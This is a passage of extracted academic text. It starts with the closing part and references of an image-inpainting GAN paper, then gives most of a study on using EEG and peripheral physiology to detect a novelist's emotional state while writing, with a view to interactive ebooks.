gradient explosion problems. using the loss function of wgan-gp to update the network parameters to inpainting the image, not only the similarity of the inpainting image structure, but also the matching degree of the image texture. the place dataset is used for network training and testing. the subjective evaluation method and the objective evaluation method are used to evaluate the inpainting image. the objective evaluation method selects ssim and psnr to make an objective evaluation of the inpainting image. the comparison between the image inpainting model and the inpainting model of other papers verifies the effectiveness of the algorithm in this paper. references [ ] bertalmio m, sapiro g, caselles v, et al. image inpainting[c]. international conference on computer graphics and interactive techniques, : - . [ ] guillemot c, meur o l. image inpainting : overview and recent advances[j]. ieee signal processing magazine, , ( ): - . [ ] goodfellow i, pouget-abadie j, mirza m, et al. generative adversarial nets[c]//advances in neural information processing systems. : - . [ ] ratliff l j, burden s a, sastry s, et al. characterization and computation of local nash equilibria in continuous games[c]. allerton conference on communication, control, and computing, : - . [ ] mirza m, osindero s. conditional generative adversarial nets[j]. computer science, : - . [ ] pathak d, krahenbuhl p, donahue j, et al. context encoders: feature learning by inpainting[c]. computer vision and pattern recognition, : - . [ ] yang c, lu x, lin z, et al. high-resolution image inpainting using multi-scale neural patch synthesis[c]. computer vision and pattern recognition, : - . [ ] radford a, metz l, chintala s, et al. unsupervised representation learning with deep convolutional generative adversarial networks[j]. arxiv: learning, . [ ] zhu j, park t, isola p, et al. unpaired image-to-image translation using cycle-consistent adversarial networks[c]. international conference on computer vision, : - . [ ] kim t, cha m, kim h, et al. learning to discover cross-domain relations with generative adversarial networks[j]. arxiv: computer vision and pattern recognition, . [ ] yi z, zhang h, tan p, et al. dualgan: unsupervised dual learning for image-to-image translation[c]. international conference on computer vision, : - . [ ] efros a a, freeman w t. image quilting for texture synthesis and transfer[c]. international conference on computer graphics and interactive techniques, : - . [ ] pathak d, krahenbuhl p, donahue j, et al. context encoders: feature learning by inpainting[c]. computer vision and pattern recognition, : - . [ ] iizuka s, simoserra e, ishikawa h, et al. globally and locally consistent image completion[j]. acm transactions on graphics, , ( ). [ ] yu j, lin z, yang j, et al. generative image inpainting with contextual attention[c]. computer vision and pattern recognition, : - . [ ] wang y, tao x, qi x, et al. image inpainting via generative multi-column convolutional neural networks[c]. neural information processing systems, : - . submitted october accepted april published may corresponding author jan b.f. van erp, jan.vanerp@tno.nl academic editor sally jo cunningham additional information and declarations can be found on page doi . /peerj-cs. copyright van erp et al. distributed under creative commons cc-by . open access toward physiological indices of emotional state driving future ebook interactivity jan b.f. van erp , , maarten a. hogervorst and ysbrand d. van der werf perceptual and cognitive systems, tno, soesterberg, the netherlands human media interaction, university of twente, enschede, the netherlands anatomy & neurosciences, vu university medical center, amsterdam, the netherlands abstract ebooks of the future may respond to the emotional experience of the reader. (neuro-) physiological measures could capture a reader’s emotional state and use this to enhance the reading experience by adding matching sounds or to change the storyline therewith creating a hybrid art form in between literature and gaming. we describe the theoretical foundation of the emotional and creative brain and review the neurophysiological indices that can be used to drive future ebook interactivity in a real life situation. as a case study, we report the neurophysiological measurements of a bestselling author during nine days of writing which can potentially be used later to compare them to those of the readers. in designated calibration blocks, the artist wrote emotional paragraphs for emotional (iaps) pictures. analyses showed that we can reliably distinguish writing blocks from resting but we found no reliable differences related to the emotional content of the writing. the study shows that measurements of eeg, heart rate (variability), skin conductance, facial expression and subjective ratings can be done over several hours a day and for several days in a row. in follow-up phases, we will measure readers with a similar setup. subjects human–computer interaction, brain–computer interface, multimedia keywords creativity, reading, emotion, neurophysiology, brain–computer interfaces, ebook, interactivity, eeg, multimedia, human–computer interaction introduction the sales of ebooks are rapidly increasing and are expected to surpass that of printed books in the near future. in its basic form, an ebook is an electronic version of the printed book. however, the devices used to access an ebook (ereader, tablet, etc.) have more capabilities than just displaying the book and turning pages on request of the reader. the device may enable true bidirectional interaction with the reader, which is a significant innovation compared to the one-directional printed book. this interactivity may substantially change the future of the ebook as artistic form and may result in new interactive media products that only slightly resemble the basic version of the printed book as sold today. together with scientific and cultural organizations we have started to explore the potential of interactive ebooks. one of the key questions is which reader parameter or actions (other than turning pages) are useful for interactive ebooks. one of the driving forces behind this exploration was the prominent dutch writer arnon grunberg who also had a genuine interest in what his readers actually experience while reading his work, or how to cite this article van erp et al. ( ), toward physiological indices of emotional state driving future ebook interactivity. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jan.vanerp@tno.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. more generally stated: ‘‘is reading a novel good for you?’’ (the writer himself takes a devil’s advocate stance and postulates the possibility that reading literature has a detrimental influence (grunberg, )). from neuroscientific data, we know that reading is a complex task involving many brain areas (he et al. ( ), see carreiras et al. ( ) for a recent review and nijhof & willems, ( ) for individual differences in narrative comprehension) and that reading can (at least temporarily) alter connectivity in an individual’s brain (dehaene et al., ; berns et al., ). however, just reading text doesn’t make one more social or empathetic. this may only happen after so-called ‘‘emotional transportation’’ (bal & veltkamp, ; johnson, ), i.e., as a reader one needs to be involved at an emotional level. it is postulated that there are no effects of reading non-fiction and also no effects of reading fiction when there is no emotional transportation (kidd & castano, ). a similar concept (immersion) is used in the ‘‘fiction feeling hypothesis’’ (hsu, conrad & jacobs, ) which postulates that negative, high arousal text activates the affective empathic network (walter, ) which facilitates immersion in the text. in an experiment, participants read neutral and fearful sections of the harry potter saga and the results indeed showed a relation between neuronal activation pattern and subjectively rated immersion. emotional experience is not only an essential catalyst, but also important in choosing which book to read, experiencing the content (johansen, ) and interpreting the narrative (mar et al., ). all the above led us to develop a research project to measure readers’ emotions while reading an ebook. emotional state can be a key parameter to drive interactivity in future ebooks and may be viable in a real-life situation using recent brain–computer interface (bci) technology. in addition, we were interested in measuring the emotions of the writer during the writing process to be able to compare the reader’s emotional state while reading a certain paragraph to that of the author during writing that same paragraph. capturing the emotional state of the writer (both through neurophysiology and subjective ratings) became our case study and is reported in this paper to illustrate the use of sensor technology and to investigate whether prolonged physiological measurements are feasible in a real life situation. the framework described here is the basis for follow-up studies in which several hundreds of readers will read the book before publication while being measured with a similar setup as used here with the author (brouwer et al., ). the applied, real life perspective guided the selection of theoretical models and measurement methods. art, beauty and neuroscience there is a growing interest in using neurophysiological measures to assess media, including paintings, music and films. research in this area is still at the forefront of cognitive neuroscience and results and theoretical foundations are still under debate. an important question that has fascinated and divided researchers from both the neurosciences and the humanities is whether brain activity can provide insight in what true art and beauty is. from an applied point of view, the relevant question is whether an individual’s brain pattern is informative of his or her appraisal of the piece of art. research of zeki and colleagues, amongst others, has shown that there is a functional specialization for perceptual versus aesthetic judgments in the brain (ishizu & zeki, ) and that there is a difference in van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. activation pattern for paintings experienced as beautiful by an individual and those experienced as ugly. this finding is independent of the kind of painting: portrait, landscape, still life, or abstract (kawabata & zeki, ). hasson and colleagues ( ) used fmri to assess the effects of different styles of filmmaking on brain patterns and suggest that neurophysiological sensing techniques can be used by the film industry to better assess its products. the latter was done by fleureau, guillotel & orlac ( ) who measured skin conductance as an affective benchmark for movies and by golland, keissar & levit-binnun ( ) who measured cardiovascular and electrodermal signals and found a high degree of simultaneity between viewers, but also large individual differences with respect to effect size. so far, interactivity based on viewers emotional state has not moved beyond a few artistic experiments: ‘‘unsound’’ by filmtrip and sarc (http://www.filmtrip.tv/) and ‘‘many worlds’’ by alexis kirke (http://www.alexiskirke.com/). in this paper we look at the (applied) neuroscience behind both the creative and the emotional brain and how emotional state can be captured using wearable, mobile technology that is usable while reading an ebook. we will also explore the possibilities opened up after capturing a reader’s emotional state and what the ebook of the future might look like. the paper also presents the data of the writer during the creation of emotional text (van der werf & van erp, ). the emotional brain stimuli evoking emotions are processed in the brain through specific pathways and with the involvement of several brain areas. in other words, the emotional brain is a network of collaborating brain areas and not a single location (dalgleish, ; tovote, fadok & luthi, ). the majority of the sensory information entering the brain goes to the primary sensory areas, but a small part of the information goes to the amygdala, part of the limbic system deep inside the human brain. a main driver of the amygdala is danger: in case of a potential threat to the organism, the amygdala is able to respond quickly and prepare the body for action without much stimulus processing. the amygdala enables the release of stress hormones leading to peripheral effects, for instance increased heart rate to pump more blood to the lungs and muscles. after the amygdala, processing continues through the cingulate cortex, the ventromedial prefrontal cortex and finally the dorsolateral prefrontal cortex. only in the dorsolateral prefrontal cortex is the processing stream through the amygdala integrated with the more cognitive processing stream from the sensory cortices. the emotional experience is a result of the interpretation of both processing routes taking into account the context and previous experiences. this integration and interpretation of information is a typical function of the prefrontal cortex (isotani et al., ). psychological framework of emotions before we can discuss how we can measure emotional state, we should first look into the frameworks to classify emotions. there are many psychological frameworks available. classic work by ekman ( ) and russell ( ) shows that there are several basic emotions: fear, disgust, anger, happiness, sadness and surprise. this set of six basic emotions has been expanded through the years with numerous subclasses. from a neuroscientific van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.filmtrip.tv/ http://www.alexiskirke.com/ http://dx.doi.org/ . /peerj-cs. point of view, an important question is whether these emotions each have their own (unique) neuronal location or circuit (i.e., a discrete model (barrett & russell, )), or vary along several independent dimensions (i.e., a dimensional model (mauss & robinson, )), a matter that is still under debate. as described above, experiencing an emotion is the result of the integration and interpretation of numerous information streams by an extended network of brain areas which makes a discrete model unlikely. therefore, we adopt a dimensional model, or more specifically the circumplex model of emotion (russell, ; russell & barrett, ; posner, russell & peterson, ) in which emotions are plotted in two dimensions: arousal and valence. for instance, anger is linked to negative valence and high arousal, sadness to negative valence and low arousal, and happiness to positive valence and high arousal and contentment to positive valence and low arousal. this model is commonly used to investigate for instance emotional words, facial expressions, and affective states. the circumplex model of emotion stems from the ratings of individual, written words. neuro imaging studies confirm the two-dimensional model of valence and arousal and although there may be complex interactions between both dimensions, they both have a different signature of brain activation, spatially as well as temporally. arousing words show a different pattern (compared to neutral words) mainly in the early processing stages (i.e., within ms after presentation including the following erp components: early posterior negativity (epn), p , n , p , and n ) while the difference between positively versus negatively valenced words shows in later processing stages (between and ms after presentation including the late positive complex (lpc)) (rellecke et al., ). in the spatial domain, arousal is linked to amygdala activity and valence to the cingulate cortex and the orbitofrontal cortex (colibazzi et al., ; herbert et al., ; kuchinke et al., ; lewis et al., ; posner et al., ). excellent reviews are given by kissler, assadollahi & herbert ( ) and citron ( ). based on her review, citron (citron, ) comes to the conclusion that positive and negative valence may differ with respect to the cognitive functions they activate and are not necessarily a continuous dimension. although a novel is more than a collection of individual words, there has been very little research on the physiological reactions to reading larger pieces of text (see the first section of this paper), but a lot to reading individual words. this project aims to fill that void. emotion classification using neurophysiological measures with the circumplex model as point of departure, we can start to identify physiological signals that reflect the arousal and valence of emotions and that can potentially be measured while reading outside a laboratory environment. we will look at a broader range of methods used to induce an emotional state than written words and at a broader set of physiological measures than eeg and fmri. for example, min, chung & min, ( ) induced emotional state by letting subjects imagine pleasant, unpleasant, aroused and relaxed situations and measured effects on eeg, heartrate, skin conductance, skin temperature and respiration. valence valence requires central nervous system indices as it is less clearly reflected in peripheral measures. wearable sensors like eeg are not able to measure activity in deeper structures van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. like the limbic system but as reviews show (kissler, assadollahi & herbert, ; citron, ), valence is strongly linked to later processing stages involving more superficial brain structures related to cognitive processing. valence is reflected in (late) erp components (bayer, sommer & schacht, ; herbert, junghofer & kissler, ; holt, lynn & kuperberg, ), in the power in specific eeg frequency bands like alpha (bahramisharif et al., ; klimesch, sauseng & hanslmayr, ), in the relative power in different eeg bands (ko, yang & sim, ) and in asymmetrical alpha activity in the prefrontal cortex (isotani et al., ; fox, ; schmidt & trainor, ; tomarken et al., ) indicating increased left prefrontal cortex activity for positive valence and increased right prefrontal cortex for negative valence. however, power in the different frequency bands and hemispheric asymmetry are under the influence of many factors, which may only partially correspond to emotional valence. for example, hemispheric asymmetry has been linked to stress (lewis, weekes & wang, ) and the tendency to approach versus to avoid stimuli (verona, sadeh & curtin, ), and low power in the alpha band may be caused by the fact that stimuli with high valence may attract more attention (brouwer et al., ; muehl et al., ). arousal arousal is less clearly linked to brain activation patterns except for activity in the amygdala and the reticularformation (posner, russell & peterson, ), which aredifficult to measure with wearable sensors like eeg. however, arousal is reasonably clearly reflected through a relatively strong activation of the sympathetic as compared to the parasympathetic autonomous nervous system. arousal can be measured peripherally through, for instance, skin conductance (increasing conductance with increasing arousal (roth, )), heart rate variability (hrv), especially high frequency hrv as this is exclusively affected by the parasympathic system (reduced high frequency hrv with increased arousal (berntson et al., )), pupil size, heart rate (hr) and respiration frequency (all increased with increased arousal, although this pattern is not consistent over studies, see kreibig ( ) for an elaborate overview). current state of the art in (applied) emotion capture the state-of-the-art in emotion detection using neurophysiological indices is that we are able to distinguish several valence and arousal levels in a lab environment when subjects are sitting still and sufficient control data is gathered beforehand to train classification algorithms (see van erp, brouwer & zander ( ) for an overview). however, it is important to note that the relation between physiology and emotion is not straightforward. different studies with different stimuli and contexts report different types of correlations (kreibig, ; dockray & steptoe, ). it is thus important to study relations between (neuro-) physiology and emotion within the context and under the circumstances of interest (brouwer et al., ; van erp, lotte & tangermann, ). an important step in this project, is to bring neurophysiological signals out of the lab and explore their potential value in daily life (van erp, brouwer & zander, ; van erp, lotte & tangermann, ). monitoring and using the (neuro-) physiological signals of van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. readers is new, and entertainment in general is a good first case to transfer the technology from the laboratory to real life. this transition will come with several challenges ranging from coping with external noise due to movement artifacts, multitasking users, and usability aspects such as prolonged usage (van erp, lotte & tangermann, ; van erp et al., ; van erp et al., ). first steps in this transition have recently been made in studies investigating eeg signals in gaming (reuderink, mühl & poel, ) and into music perception in realistically moving participants (leslie, ojeda & makeig, ). here we also present the case of the writer wearing physiological sensors for several hours a day and for days in a row. the creative brain the current case study focused on the writer and his emotional signals during the creative writing process. our primary goal was to implement and learn about the transition from laboratory to real life before upscaling the set-up to hundreds of readers, and to capture the emotional signals of the writer as function of the emotional content of the written paragraphs. we deemed it worthwhile, nevertheless, to have a quick look at the creative brain as well. most people would agree that creative abilities make us unique in the animal kingdom. interestingly, we understand little of the processes that drive or facilitate creativity and still debate on the definition of creativity, although most agree upon the importance of both novelty and usefulness (see piffer ( ) for an elaborate discussion). similar to the neuroscience of art and beauty, neuroscientific research into creativity can still be characterised as embryonic and neuroscientific models are not widely established yet. like emotion, creativity is not related to a single brain area but rather to networks of brain areas. based on an extensive review, dietrich & kanso ( ) even stated that ‘‘creativity is everywhere’’; see also arden et al. ( ). having said that, recent neuroimaging studies seem to show that creativity involves common cognitive and emotional brain networks also active in everyday tasks, especially those involved in combining and integrating information. for the current project, it is useful to distinguish two different types of creative processes as described by dietrich ( ). the first can be called controlled creativity often in relation to finding creative solutions for a particular, given problem. this creative process is controlled through the prefrontal cortex (ellamil et al., ) that guides the search for information and the combination of information within a given solution space. a powerful mechanism which is bound, though, by limitations of the prefrontal cortex; for instance, with respect to the number of solutions that can be processed in working memory. the second type can be named spontaneous creativity, often in relation to artistic expression. this form of creativity comes without the restrictive control from the prefrontal cortex, and the process differs from controlled creativity qualitatively (e.g., solutions are not bound by rational rules like the rules of physics) and quantitatively (the number of solutions is not restricted by for instance the limited capacity of working memory). spontaneous creativity is linked to unconscious processes (of which dreaming may be an extreme form). however, the prefrontal cortex becomes involved in spontaneous creativity when solutions will eventually reach the conscious mind, and the prefrontal cortex is required to evaluate them and bring them to further maturity. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recent data show us that less activity in the dorsolateral prefrontal cortex links to increased spontaneous creativity in, for instance, musicians (limb & braun, ; liu et al., ), and increased activation to increased controlled creativity. results also show that there is a burst of wide-spread gamma activity about ms before the moment of insight in spontaneous creativity. gamma activity is, amongst other features, linked to binding pieces of information. a burst of gamma activity is indicative of finding (and binding) a new combination of chunks of (existing) information. fink & benedek ( ) underline the importance of internally oriented attention during creative ideation in a more general sense, reflected in an increase in alpha power. creativity is also linked to hemispheric asymmetry. a meta-analysis (mihov, denzler & förster, ) showed that the right hemisphere has a larger role in creative processes than the left hemisphere. this is confirmed by patient research (mayseless, aharon-peretz & shamay-tsoory, ; shamay-tsoory et al., ). a lesion in the right medial prefrontal cortex hinders the creation of original solutions while a lesion in the left medial prefrontal cortex seems to be beneficial for spontaneous creativity. however, experiments with creative students (carlsson, wendt & risberg, ) and extremely creative professionals from science and arts (chávez-eakle et al., ) both show bilateral cerebellum involvement, seemingly confirming the statement that ‘‘creativity is everywhere in the brain.’’ however, these findings are general findings and may not be applicable to the creative writing process (shah et al., ). for instance, creative writing seems to result in increased activity in the left prefrontal cortex (presumably because of its links to important language areas in the left hemisphere) except when writing emotional text, for which activity in the right hemisphere seems to be greater. this shows that the body of knowledge on the creative brain is growing but still limited and identifying neural correlates of the creative writing process requires further research. another interesting debate is whether creative writing is a skill one can develop like skilled behavior in sports and music, or possibly even non-creative, non-fiction writing like scientists and journalists do. lotze and colleagues found that the caudate nucleus (involved in skilled behavior) was active in experienced creative writers but not in novices (erhard et al., ; lotze et al., ), indicating that creative writing can indeed be a (trainable) skill. the case study methods participant arnon grunberg (http://www.arnongrunberg.com/) participated in the study. arnon grunberg was born in and has lived in new york since . he writes novels, short stories, columns, essays and plays. his work was awarded with several national and international prizes and translated into languages. he participated voluntarily, being aware that his participation would not be anonymous. all data were collected in november in arnon’s apartment in new york. the institutional review board of tno human factors (tcpe soesterberg, the netherlands) approved the study after inclusion of specific sections in the informed consent regarding privacy and data dissemination. arnon read and signed the informed consent before data gathering began. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.arnongrunberg.com/ http://dx.doi.org/ . /peerj-cs. figure location of the electrodes in the – system. apparatus we used commercially available hardware and software to record physiological parameters, facial expression and text entry. in addition, paper and pencil were used for subjective questionnaires described in the next section. all neurophysiological signals were recorded using a wearable mobita r© -channel physiologic signal amplifier system sampling at , hz (tmsi, hengelo, the netherlands, http://www.tmsi.com/). the available channels were used for eeg ( tmsi water based electrodes, see fig. for the layout of the electrodes), ecg (two pre-gelled disposable tmsi snap electrodes) and endosomatic skin potential esk (pair of tmsi finger electrodes). the mobita r© has built-in accelerometers which we used to log possible activity of the writer and to synchronize the physiological data to other data gathered through a noldus observer xt r© system (noldus it, wageningen, the netherlands; http://www.noldus.com/). this system recorded the images from two ip cameras (one providing an overview of the work space and one providing a close-up of the writer’s face for later analysis of his facial expression), a continuous screen dump of the writer’s pc screen, and the writer’s keystrokes (noldus ulog tool r©). the writer used his normal work space and own pc, see fig. . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.tmsi.com/ http://www.noldus.com/ http://dx.doi.org/ . /peerj-cs. figure writer showing the neurophysiological sensors (a) and during writing (b). table experimental protocol for one day. start of the day instrumentation of the participant and check of measurement systems calibration of emotional state subjective questionnaires: feelings grid, vas, des full block continuous monitoring of physiology and facial expression continuous logging of text entry continuous observation by experimenter subjective questionnaires at significant eventsa: feelings grid, des self subjective questionnaires at end of block: feelings grid, vas, des self, des book block similar to block end of the day subjective questionnaires: feelings grid, vas, des full open questions notes. asignificant events could include a writer’s block, or moment of great insight etc. to be identified by the participant himself. eventually, no ‘significant events’ were indicated. experimental protocol table gives the outline of the experimental protocol for one day. table gives the details on the experimental protocol. data processing our intention was to use the calibration sessions of each day to identify differences in physiological markers that could be linked to the emotional content of the written paragraph. when we can reliably establish this ‘ground truth,’ it could consecutively be used to analyze the data gathered during the writing blocks. after checking the synchronization between the different data streams, the physiological data of the calibration session were van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table specification of the experimental protocol. instrumentation of the participant and check of measurement systems the physiological sensors were attached to the writer and signals checked for their integrity. video cameras, screen and keyboard logging were switched on and checked. the mobita recorder was time linked to the observer xt sys- tem by using the mobita to type a specific series of key strokes recorded by the accelerometers in the mobita, the ulog module of the observer xt and the overview camera. calibration of emotional state •at the beginning of each day the following calibration data were recorded in fixed order: ◦ min of rest with eyes open ◦ min of rest with eyes closed ◦ blocks of min filled with writing a paragraph with the following instruction: ‘‘write a paragraph on this picture with emotion×, as if you are writing a paragraph in your novel.’’ this instruction was ac- companied with an a sized, full color picture from the iaps database (lang, bradley & cuthbert, ) matching emotion× (disgust, fear, sadness, amusement, contentment, excitement). we selected pic- tures from the iaps database, for each emotion: disgust ( , , , , , , , , , ), fear ( , , , , , , , , , ), sadness ( , , , , , , , , , ), amusement ( , , , , , , , , , ), contentment ( , , , , , , , , , ), and excite- ment ( , , , , , , , , , ). the order of the emotions was bal- anced over the days, each picture was only used once during the experiment. ◦ min of rest with eyes open ◦ min of rest with eyes closed feelings grid •the feelings grid (russell, weiss & mendelsohn, ) was a pen and paper a -sized form with the instruction ‘‘please indicate how you feel right at this moment. place an ‘‘x’’ in the box closest to how you are feeling at this time.’’ the form consisted of a × square grid with the following markers: ◦middle-top: arousal, middle-bottom: sedation, sleepiness ◦ left-middle: unpleasant, right-middle: pleasant ◦ left-top: anger, stress; right-top: joy excitement ◦ left-bottom: depression, sadness; right bottom: relaxation, contentment vas (visual analog scale) the vas was a pen and paper test with the instruction ‘‘please mark how you feel right at this moment.’’ four scales were printed on one a : relaxed–agitated, happy–sad, optimistic–pessimistic, state of flow–no flow. des full the des (fredrickson et al., ) full was a paper and pen test with the instruction ‘‘please indicate how each emo- tion reflects how you feel right at this moment.’’ it depicted the following items on an a -sized paper with five tick boxes to their right representing not at all ( )—completely ( ): amusement, awe, contentment, grat- itude, hope, love, pride, sexual desire, joy, interest, anger, sad, scared, disgust, contemptuous, embarrassed, repen- tant, ashamed, surprised, sympathetic. des self the des self was a paper and pen test with the instruction ‘‘please mark the emotions that best reflect your feelings over the past measurement period.’’ it contained the same items as the des full on an a -sized form but with only one tick box to their right. des book the des book was the same as the des self, except for the instruction: ‘‘please mark the emotions that best describe the section you wrote in the past measurement period.’’ open questions during the debriefing, the writer answered several open questions about the use of substances (coffee, tea, cigarettes, medication etc.), the experience of flow, satisfaction about the progress, significant moments during the writing etc. the experimenter could expand the open questions based on observations made during the day. separated in epochs corresponding to min rest eyes open, min rest eyes closed, × min ‘emotional writing’ (each corresponding to one of six different emotional pictures and descriptors), and again min rest eyes open, min rest eyes closed. eeg. the eeg data were processed using the following pipeline: re-referencing to channel tp , rejection of channels with very large variance (channels o , oz and o were very van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. noisy and removed completely from the dataset), band pass filtering . – hz, and down sampling to hz. initialy, the eeg data of the remaining channels were used in an independent component analysis (ica) to identify and remove potential artifacts. however, the ica revealed that potential artifacts were non-stationary (i.e., changing over time) and therefore difficult to identify and thus no more data were removed. the power in different frequency bands: delta ( – hz), theta ( – hz), alpha ( – hz), smr ( – hz), beta ( – hz) and gamma ( – hz) were used as features in the classification. peripheral physiology. as a measure of heart rate, we determined the mean interval between successive r-peaks in the ecg (rri) for each epoch and converted this to mean heart rate (meanhr = /meanrri). four measures of heart rate variability were derived. the root mean squared successive difference between the rris (rmssdrri) reflects high frequency heart rate variability. we also determined heartrate variability in the low, medium and high band using a spectral analysis (hrvlow, hrvmed, hrvhigh). high-frequency heart rate variability was computed as the power in the high frequency range ( . – . hz) of the rri over time using welch’s method applied after spline interpolation; similarly for mid-frequency ( . – . hz) and low-frequency ( – . hz) heart rate variability. no anomalies were present in the ecg data so no data was removed. from the esk, the mean esk over the epochs was calculated. for the esk we removed one outlier (contentment epoch on day ). classification analysis using eeg and peripheral physiology features. to determine how well various feature sets could predict the emotional state of the author during the calibration session we performed a classification analysis. classification was performed using the donders machine learning toolbox (van gerven et al., ). two types of classifiers were used: a linear support vector machine (svm) and an elastic net model with logistic regression (friedman, hastie & tibshirani, ). as input we used the features that were standardized to have mean and standard deviation on the basis of data from the training set. one-tailed binomial tests were used to determine whether classification accuracy was significantly higher than chance. facial expression. the images from the close-up camera were analysed offline using noldus facereader software. output for each epoch are intensity values for the following classifications: neutral, happy, sad, angry, surprised, scared, disgusted. subjective questionnaires. the data of the feelings grid, vas, and des full questionnaires was not pre-processed but directly analysed. we only statistically analysed the main effects of day ( levels) and session (start of day and end of day for des full, and start of day, end of block , end of block , end of day for feelings grid and vas). the des full scores were analysed using non-parametric statistics with alpha level bonferroni adjusted for the number of comparisons. feelings grid and vas scores were analysed with a parametric anova. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. procedures we started the measurements on the day the writer started with a new novella to be used in phase of the project. we adjusted the measurements to his usual daily writing schedule comprising two blocks: one in the morning and one in the late afternoon or early evening. he normally writes for about two hours and fills the time in between with other activities (including other writing activities). during a writing block, he was engaged in other activities as well like answering emails and phone calls etc., but never during the instrumentation and calibration. all activities during the measurement blocks were logged by the experimenter who was always present during the measurements. we measured for nine consecutive days. at the end of the day, the experimenter and the writer would make a specific schedule for the next day. the writer also reflected on his experiences over the day, including the user experience of wearing the equipment and being observed. the day before the start of the experiment, the protocol, instructions etc. were explained in great detail, the writer signed the informed consent, his workplace was instrumented and the equipment tested. besides the addition of the equipment, the writer’s workplace was not altered in any way to give the writer the best opportunity to behave as usual. on each measurement day, the experimenter came to the apartment as scheduled and followed the protocol as detailed above. at the end of the day, all data were encrypted and saved to an external hard disk. results classification of baseline vs. emotion conditions in the calibration blocks first, we determined whether the feature set contained information to discriminate the baseline conditions (eyes open and eyes closed) from the emotional (writing) epochs using binary classification (baseline vs. non-baseline). for this purpose we performed a ‘leave- one-day-out’ cross validation using the svm classifier. this method is to be preferred over random n-fold cross validation since it better accounts for possible correlations between data during the day (lemm et al., ). still, the results when using random folds were found to be comparable to the results of the analysis presented here. it is also important to compensate for the imbalance in the number of conditions, with baseline blocks and emotional blocks in the set. all reported performance scores follow a binomial distribution and the variability of the binomial distribution follows directly from the average score and the number of measurements (the distribution is not well approximated with a gaussian distribution and therefore the variance is not a good indicator of the variability in the results). for a larger number of measurements the variability is approximately equal to p*( -p)/n (with p estimated by the score, n the number of measurements). when all six physiology features (i.e., meanhr, hrvlow, hrvmed, hrvhigh, rmssdrri, meanesk were used as input to the classifier the average model performance (over all days)) was %, with a hit-rate (score for correctly classifying baseline blocks) of % and a false-alarm-rate (fa-rate, i.e., fraction of falsely classified emotional blocks) of %, resulting in an equal cases (in the situation in which both conditions occur equally frequent) performance of % (p < . ). individual anovas with condition as independent variable (baseline vs. writing) and physiological measure as dependent van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure results of the physiological measures heart rate (a) and rmssd rri (b) as function of the different calibration blocks. eyes open and eyes closed blocks were measured before and after the emo- tional blocks. the order of the emotional blocks was balanced over days. error bars denote the standard error of the mean. variable showed significant differences for the heart rate variability measures only (all f values > . , all p values < . ). figure gives the hr and rmssd rri as function of calibration block. figure summarizes the power distribution for the different frequency bands averaged over the rest epochs (fig. a) and the writing epochs (fig. b). when the eeg features van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure column (a) shows the power in the different frequency bands in the rest blocks (eyes open and eyes closed combined) and column (b) in the writing blocks. column (c) gives the weights of the features in the classification model. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. were used as input, the average model performance (over all days) was % with a hit-rate of % and a false-alarm-rate (fa-rate) of %, resulting in an equal cases performance of % (p < . ). the model weights are depicted in fig. c. inspecting fig. shows that there are three major differences between rest and writing reflected in the model weights. the writing blocks show: ( ) increased frontal power in the delta and theta bands, ( ) wide spread suppression of alpha, and ( ) central increase in beta and gamma activity. the first effect is most likely caused by eye movements. the second effect relates to the suppression of the brain’s idle state during rest. the increase in gamma activity may be related to creative processes as described in ‘the creative brain’, but gamma components are also susceptible to muscle artifacts caused by e.g., jaw clenching and forehead movements. if we only use the alpha and gamma features in the classifier, equal class performance is %, indicating that a reliable difference can be obtained without using features that may be contaminated with eye movements. when all features (peripheral physiology and eeg) were used as input the average model performance was also %, with a hit-rate of % and a false-alarm-rate (fa-rate) of %, resulting in an equal cases performance of % (p < . ), a non-significant improvement relative to using only eeg features, indicating that the added value of incorporating features other than eeg ones is small in this case. a closer inspection of the feature weights in the classification model showed that the highest weights are attributed to the delta ( – hz) and theta ( – ) bands in channels fp , fpz, fp (i.e., frontal channels). the equal class performance of a classification model using only these six features is . (compared to . for a model using all features). slow ( – hz) frequency bands of eeg may pick up eye movements and should be evaluated with caution (please note that eye movements were not removed from the eeg data). indirect measurement of eye movements in the eeg signal masks the information in the primary eeg. even in case it is a reliable classifier for the current experimental setup, we consider it an artifact. classification of valence and arousal in the calibration blocks model performance was determined for classifying low vs. high valence and arousal using -fold cross validation using a range of parameters: • features from eeg, physiology or both, • binary classification for predicting outcomes higher than the median value or using only the extreme values, i.e., lower than the . -quantile or higher than the . -quantile, • using raw or normalized features, in which case the features were normalized by dividing by the average feature value for the eyes-open conditions (for that day), • using svm or elastic net classifier with logistic regression. in none of the cases did we find classification performance deviating significantly from chance performance. since classification performance using the whole set of eeg data did not result in above-chance performance, we did not continue using specific subsets only, e.g., to look at the power in specific eeg frequency bands like alpha (bahramisharif et al., ; klimesch, sauseng & hanslmayr, ), at the relative power in different eeg bands (herbert, junghofer & kissler, ) and at asymmetrical alpha activity in the prefrontal van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cortex. individual anovas on the physiological measures confirmed these observations: all f-values < . and all p 